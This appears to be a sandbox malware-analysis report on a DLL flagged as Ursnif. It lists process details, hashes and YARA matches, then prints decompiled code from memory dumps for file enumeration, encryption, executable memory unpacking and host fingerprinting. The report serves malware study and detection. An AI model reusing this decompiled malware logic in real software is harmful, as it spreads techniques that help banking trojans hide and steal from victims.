Commandline:	rundll32.exe C:\Users\user\Desktop\a04.dll,DllRegisterServer
Imagebase:	0x11d0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.919043739.0000000004FF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000002.1181352410.00000000010F9000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.919333557.0000000004FF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.919382135.0000000004FF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.918914357.0000000004FF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.806401680.00000000006B0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000002.1182966669.0000000004FF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.918874706.0000000004FF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.919207187.0000000004FF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.918946609.0000000004FF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.919351635.0000000004FF8000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5300 Parent PID: 2792

General

Start time:	15:51:34
Start date:	07/10/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:17410 /prefetch:2
Imagebase:	0x190000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: iexplore.exe PID: 4184 Parent PID: 2792

General

Start time:	15:53:05
Start date:	07/10/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:82960 /prefetch:2
Imagebase:	0x190000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: iexplore.exe PID: 4044 Parent PID: 2792

General

Start time:	15:53:27
Start date:	07/10/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:17424 /prefetch:2
Imagebase:	0x190000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: iexplore.exe PID: 5264 Parent PID: 2792

General

Start time:	15:53:31
Start date:	07/10/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:17432 /prefetch:2
Imagebase:	0x190000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: iexplore.exe PID: 3604 Parent PID: 2792

General

Start time:	15:54:03
Start date:	07/10/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:82984 /prefetch:2
Imagebase:	0x190000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 5692 Parent PID: 5384 loaddll32.exeCOMMON

Executed Functions

Function 00FC4E9C, Relevance: 34.7, APIs: 23, Instructions: 222
memoryfiletimeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00FC4E9C(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0xfca2cc; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0xfca290, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0xfca2cc; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0xfca290, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0xfca290, _t146, _v20);
					goto L36;
				}
				_t136 =  *0xfca2cc; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0xfca2d0; // 0x292d5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0xfcb825; // 0x73797325
				_t83 = E00FC1000(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0xfca290, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9");
					CloseHandle(_v32);
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0xfca2d0; // 0x292d5a8
				_t16 = _t93 + 0xfcb846; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}

0x00fc4ea5
0x00fc4eab
0x00fc4ead
0x00fc4ec7
0x00fc4ecb
0x00fc4ece
0x00fc5143
0x00fc514a
0x00fc514a
0x00fc4ed4
0x00fc4ee9
0x00fc4eeb
0x00fc4eef
0x00fc4ef2
0x00fc5133
0x00fc513d
0x00000000
0x00fc513d
0x00fc4ef8
0x00fc4f03
0x00fc4f08
0x00fc4f0d
0x00fc4f10
0x00fc4f17
0x00fc4f1e
0x00fc4f21
0x00fc5123
0x00fc512d
0x00000000
0x00fc512d
0x00fc4f37
0x00fc4f3b
0x00fc4f3e
0x00fc4f41
0x00fc4f49
0x00fc4f4c
0x00fc4f55
0x00fc4f5b
0x00fc4f65
0x00fc4f6c
0x00fc4f6c
0x00fc4f7e
0x00fc4f89
0x00fc4f97
0x00fc4f9c
0x00fc4fa1
0x00fc4fa4
0x00fc4fa9
0x00fc4fb3
0x00fc4fb6
0x00fc4fb9
0x00fc4fcf
0x00fc4fd3
0x00fc4fd6
0x00fc5121
0x00000000
0x00fc5121
0x00fc4fed
0x00fc503e
0x00fc5001
0x00fc5009
0x00fc500e
0x00fc501c
0x00fc5025
0x00fc502e
0x00fc502e
0x00fc503c
0x00fc503c
0x00fc5042
0x00fc5046
0x00fc5046
0x00fc504c
0x00000000
0x00000000
0x00fc504e
0x00fc5054
0x00fc50fb
0x00fc50fe
0x00fc510b
0x00fc510b
0x00fc510f
0x00000000
0x00000000
0x00fc5104
0x00fc5108
0x00fc5108
0x00fc510a
0x00fc510a
0x00fc5114
0x00fc511b
0x00fc511d
0x00000000
0x00fc511d
0x00fc505a
0x00fc505c
0x00fc505c
0x00fc506f
0x00fc5075
0x00fc5080
0x00fc5082
0x00fc5086
0x00fc5088
0x00fc5088
0x00fc508d
0x00fc508f
0x00fc508f
0x00fc508d
0x00fc5094
0x00fc5098
0x00fc5098
0x00fc50a8
0x00fc50ad
0x00fc50b0
0x00fc50b0
0x00fc50b3
0x00fc50bd
0x00fc50c5
0x00fc50ca
0x00fc50d8
0x00fc50d8
0x00fc50ec
0x00fc50f0
0x00fc50f0

APIs

RtlAllocateHeap.NTDLL(00000000,63699BC3,00FCA380), ref: 00FC4EC7
RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00FC4EE9
memset.NTDLL ref: 00FC4F03

Part of subcall function 00FC1000: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00FC4F1C,73797325), ref: 00FC1011
Part of subcall function 00FC1000: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00FC102B

CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00FC4F41
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00FC4F55
CloseHandle.KERNEL32(?), ref: 00FC4F6C
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00FC4F78
lstrcat.KERNEL32(?,642E2A5C), ref: 00FC4FB9
FindFirstFileA.KERNELBASE(?,?), ref: 00FC4FCF
CompareFileTime.KERNEL32(?,?), ref: 00FC4FED
FindNextFileA.KERNELBASE(00FC3EAC,?), ref: 00FC5001
FindClose.KERNEL32(00FC3EAC), ref: 00FC500E
FindFirstFileA.KERNEL32(?,?), ref: 00FC501A
CompareFileTime.KERNEL32(?,?), ref: 00FC503C
StrChrA.SHLWAPI(?,0000002E), ref: 00FC506F
memcpy.NTDLL(00FC2779,?,00000000), ref: 00FC50A8
FindNextFileA.KERNELBASE(00FC3EAC,?), ref: 00FC50BD
FindClose.KERNEL32(00FC3EAC), ref: 00FC50CA
FindFirstFileA.KERNEL32(?,?), ref: 00FC50D6
CompareFileTime.KERNEL32(?,?), ref: 00FC50E6
FindClose.KERNELBASE(00FC3EAC), ref: 00FC511B
HeapFree.KERNEL32(00000000,00FC2779,73797325), ref: 00FC512D
HeapFree.KERNEL32(00000000,?), ref: 00FC513D

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$CreateHandlelstrcatmemcpymemset
String ID:
API String ID: 455834338-0
Opcode ID: d4eadf44513ba898fa1185b2f3dcaf2dae01e073be40b666c3705d4e1b7d8c90
Instruction ID: 33d03c70835aef8c99fc0632d1304a398df9e8d292bc8b9f7bd8de6347203db2
Opcode Fuzzy Hash: d4eadf44513ba898fa1185b2f3dcaf2dae01e073be40b666c3705d4e1b7d8c90
Instruction Fuzzy Hash: FA812871D0011EAFDB119FA5DE8AFEEBBB9FB44710F14006AE505E3150D771AA84EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FC35A1, Relevance: 18.2, APIs: 12, Instructions: 163
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00FC35A1(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				void* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				void* _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				void* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0xfca0b8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0xfca0dc() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E00FC5C4E(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 =  *0xfca0d4(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0xfca0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 = _t102 + _t90;
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E00FC2A03(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}

0x00fc35aa
0x00fc35b0
0x00fc35b3
0x00fc35b9
0x00fc35b9
0x00fc35bb
0x00fc35bd
0x00fc35c0
0x00fc35c6
0x00fc35c7
0x00fc35c8
0x00fc35ce
0x00fc35d3
0x00fc35d9
0x00fc35e1
0x00fc373e
0x00fc35e7
0x00fc35e9
0x00fc35f2
0x00fc35f7
0x00fc3609
0x00fc360c
0x00fc3610
0x00fc3617
0x00fc361b
0x00fc3623
0x00fc3729
0x00fc3629
0x00fc3629
0x00fc362d
0x00fc362e
0x00fc3630
0x00fc363b
0x00fc3715
0x00fc3641
0x00fc3641
0x00fc3644
0x00fc364a
0x00fc3650
0x00fc3650
0x00fc3658
0x00fc365c
0x00fc365f
0x00fc3706
0x00fc3665
0x00fc366b
0x00fc366e
0x00fc3671
0x00fc3673
0x00fc3676
0x00fc3679
0x00fc367b
0x00fc367b
0x00fc3685
0x00fc368a
0x00fc368d
0x00fc3690
0x00fc3692
0x00fc369b
0x00fc36c5
0x00fc369d
0x00fc36ae
0x00fc36ae
0x00fc36cd
0x00000000
0x00000000
0x00fc36cf
0x00fc36d2
0x00fc36d5
0x00fc36d9
0x00000000
0x00fc36db
0x00fc36ea
0x00fc36f0
0x00fc36f8
0x00fc36f8
0x00000000
0x00fc36d9
0x00fc36dd
0x00fc36e5
0x00fc36e8
0x00fc36ff
0x00000000
0x00000000
0x00000000
0x00fc36e8
0x00fc365f
0x00fc3718
0x00fc371b
0x00fc371b
0x00fc3730
0x00fc3730
0x00fc3748

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00FC1B16,00000001,00FC6301,00000000), ref: 00FC35D9
memcpy.NTDLL(00FC1B16,00FC6301,00000010,?,?,?,00FC1B16,00000001,00FC6301,00000000,?,00FC5B47,00000000,00FC6301,?,00000000), ref: 00FC35F2
CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 00FC361B
CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00FC3633
memcpy.NTDLL(00000000,00000000,038F9630,00000010), ref: 00FC3685
CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,038F9630,00000020,?,?,00000010), ref: 00FC36AE
GetLastError.KERNEL32(?,?,00000010), ref: 00FC36DD
GetLastError.KERNEL32 ref: 00FC370F
CryptDestroyKey.ADVAPI32(00000000), ref: 00FC371B
GetLastError.KERNEL32 ref: 00FC3723
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00FC3730
GetLastError.KERNEL32(?,?,?,00FC1B16,00000001,00FC6301,00000000,?,00FC5B47,00000000,00FC6301,?,00000000,00FC6301,00000000,038F9630), ref: 00FC3738

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
String ID:
API String ID: 3401600162-0
Opcode ID: 34e3e0fd478efc612cf3cb6a853b7bbfabacb425058b2b3ab17061e0edfa15be
Instruction ID: 885195cb50c4417d7cb0df4bd06eff21018ac0bd5c37642fc60221118efa7953
Opcode Fuzzy Hash: 34e3e0fd478efc612cf3cb6a853b7bbfabacb425058b2b3ab17061e0edfa15be
Instruction Fuzzy Hash: BC515EB290420DBFDB109FA4DE8AEAE7BB8FF44390F108429F515E7250D7749E04AB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E09F906, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000814,00003000,00000040,00000814,6E09F360), ref: 6E09F9C3
VirtualAlloc.KERNEL32(00000000,000002B1,00003000,00000040,6E09F3BF), ref: 6E09F9FA
VirtualAlloc.KERNEL32(00000000,0000ED87,00003000,00000040), ref: 6E09FA5A
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E09FA90
VirtualProtect.KERNEL32(6E050000,00000000,00000004,6E09F8E5), ref: 6E09FB95
VirtualProtect.KERNEL32(6E050000,00001000,00000004,6E09F8E5), ref: 6E09FBBC
VirtualProtect.KERNEL32(00000000,?,00000002,6E09F8E5), ref: 6E09FC89
VirtualProtect.KERNEL32(00000000,?,00000002,6E09F8E5,?), ref: 6E09FCDF
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E09FCFB

Memory Dump Source

Source File: 00000000.00000002.1182830756.000000006E09F000.00000040.00020000.sdmp, Offset: 6E09F000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: e5aec10f1a0cb97d920a96a161caf5bd0c1cb3a6df24fb2d88acde02681facd5
Instruction ID: 82f0f9cb5b601b9f14a3f147ad8457523407e89c9735378e292c2c65c2a7f156
Opcode Fuzzy Hash: e5aec10f1a0cb97d920a96a161caf5bd0c1cb3a6df24fb2d88acde02681facd5
Instruction Fuzzy Hash: 44D19C766082819FDB50CF54E880B6177AAFF88350B290194ED1DDF35AD7B0A810FBB2

Uniqueness

Uniqueness Score: -1.00%

Function 6E051979, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E6E051979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6E052210();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6e0541d0;
				_push(_t15 + 0x6e05505e);
				_push(_t15 + 0x6e055054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6E05220A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x6e0541c0, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x6e051979
0x6e051982
0x6e051986
0x6e05198c
0x6e051991
0x6e051996
0x6e051999
0x6e05199c
0x6e0519a1
0x6e0519a2
0x6e0519a5
0x6e0519b0
0x6e0519b7
0x6e0519bb
0x6e0519bd
0x6e0519be
0x6e0519c1
0x6e0519c6
0x6e0519d0
0x6e0519d2
0x6e0519d2
0x6e0519e6
0x6e0519ec
0x6e0519f0
0x6e051a40
0x6e0519f2
0x6e0519fb
0x6e051a11
0x6e051a19
0x6e051a2b
0x6e051a2f
0x00000000
0x00000000
0x6e051a1b
0x6e051a1e
0x6e051a23
0x6e051a25
0x6e051a25
0x6e051a06
0x6e051a08
0x6e051a31
0x6e051a32
0x6e051a32
0x6e0519fb
0x6e051a48

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6E05176E,0000000A,?,?), ref: 6E051986
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E05199C
_snwprintf.NTDLL ref: 6E0519C1
CreateFileMappingW.KERNELBASE(000000FF,6E0541C0,00000004,00000000,?,?), ref: 6E0519E6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E05176E,0000000A,?), ref: 6E0519FD
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6E051A11
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E05176E,0000000A,?), ref: 6E051A29
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E05176E,0000000A), ref: 6E051A32
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E05176E,0000000A,?), ref: 6E051A3A

Memory Dump Source

Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: d4225c4db406d57759aaf396adf4b52919de734fd60f7bbb562b7a107fc6666a
Instruction ID: f16992ede6e9b1fa1a308e8e7d2eff0443640e5d4db6832e5b67cda52e88a40c
Opcode Fuzzy Hash: d4225c4db406d57759aaf396adf4b52919de734fd60f7bbb562b7a107fc6666a
Instruction Fuzzy Hash: A421F2B6500608BFDB02AFE8DE98FDE37BCEB49394F004425F611E7240E6709868CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00FC3946, Relevance: 12.1, APIs: 8, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00FC3946(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0xfca2c8; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E00FC354E( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0xfca2cc ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0xfca290, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E00FC3F12(_v8 + _v8, _t63);
							}
							HeapFree( *0xfca290, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0xfca290, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E00FC3F12(_v8 + _v8, _t63);
						}
						HeapFree( *0xfca290, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}

0x00fc3946
0x00fc394e
0x00fc3954
0x00fc3957
0x00fc395a
0x00fc395c
0x00fc3961
0x00fc3961
0x00fc3967
0x00fc3969
0x00fc3976
0x00fc39d7
0x00fc3978
0x00fc397d
0x00fc3983
0x00fc3988
0x00fc3996
0x00fc399a
0x00fc39a9
0x00fc39b0
0x00fc39b7
0x00fc39b7
